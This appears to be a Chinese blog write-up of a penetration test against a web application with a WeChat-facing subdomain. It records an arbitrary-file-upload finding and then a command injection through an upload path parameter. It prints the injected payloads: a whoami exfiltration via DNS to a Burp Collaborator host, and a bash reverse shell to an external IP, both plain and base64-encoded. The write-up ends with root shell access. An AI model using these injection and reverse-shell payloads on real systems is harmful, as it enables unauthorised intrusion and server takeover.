主站打开是这样的只有扫码登陆
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210110087-416090824.png)
尝试扫码提示未注册
查看js,网站用了webpack打包
所有请求都在
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210122835-710732216.png)
这个js里面
尝试寻找敏感接口无果
百度site:domain.com
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210133950-939139673.png)
注意到wx1子域,打开这个链接跳转到在微信打开
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210157212-1668315404.png)
那就到微信打开,查看功能点发现一处上传,先上传正常图片
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210249222-1479916020.png)
改最下面的filename,后缀不变
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210331713-1966705649.png)
改上面的filename参数,发现应该是任意文件上传
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210403143-735049934.png)
因为在js中发现php的ueditor(访问文件不存在)
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210412790-1282148425.png)
顾认为是php的站,于是上传php,成功上传
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210421885-116681316.png)
访问此php文件直接被下载回来,没有解析(文件在主站下)
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210429626-1494934619.png)
此时想到的是这个目录不解析php文件,上传包中有一个path参数,想着将文件上传跨目录到网站根目录
先尝试随便命名一个文件夹,可以创建,访问文件也存在
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210440042-45733831.png)
尝试../ ..跨目录失败
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210447429-101350329.png)
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210454652-714535746.png)
后面尝试各种姿势还是没能跨目录,也尝试修改上传URI
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210506374-1669285607.png)
把Image改为File,显示404
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210513779-1722474384.png)
改为upload还是在原来那个目录
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210524308-1841262609.png)
于是回头看,微信里的功能
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210536925-176800224.png)
找到一处视频上传,把图片改为mp4后缀上传抓包,发包直接报错
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210549175-512048954.png)
此时注意到报错返回的结果,是在执行视频解析的系统命令,注意到下面截图中的两个点
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210557267-531435916.png)
因为path可控那我是不是可以直接拼接命令呢,于是尝试拼接
| ping `whoami`.z889xcgz67006o0itleim0vxcoie63.burpcollaborator.net |
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210606870-2145482601.png)
dnslog收到响应whoami执行结果为root,此时确定存在命令执行
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210615174-1784683139.png)
直接反弹shell,服务器没收到
| bash -i >& /dev/tcp/123.*.*.182/8080 0>&1 |
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210627925-1581290848.png)
感觉是有特殊字符的原因,于是采用base64编码
tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash
监听的端口依然没收到响应
于是采用#注释后面的命令
tes.txt || echo YmFzaCAtaSA+JiAvZGV2L3*******uNTYuMjQuMTgyLzgwODAgMD4mMQ== | base64 -d | /bin/bash #
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210639791-1466314021.png)
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210644918-400974216.png)
成功反弹shell,发现原来是node.js的站,难怪之前不解析
wx站
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210652619-699331858.png)
主站
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210659107-1277754280.png)
此目录记录当时所做之尝试
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210707105-1382544191.png)
其实一开始就应该注意到
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210748120-2088496731.png)
Express是node.js的一个开发框架就不会在文件上传不解析那里搞那么久了
![](https://img2018.cnblogs.com/blog/858505/202002/858505-20200225210815069-1048596816.png)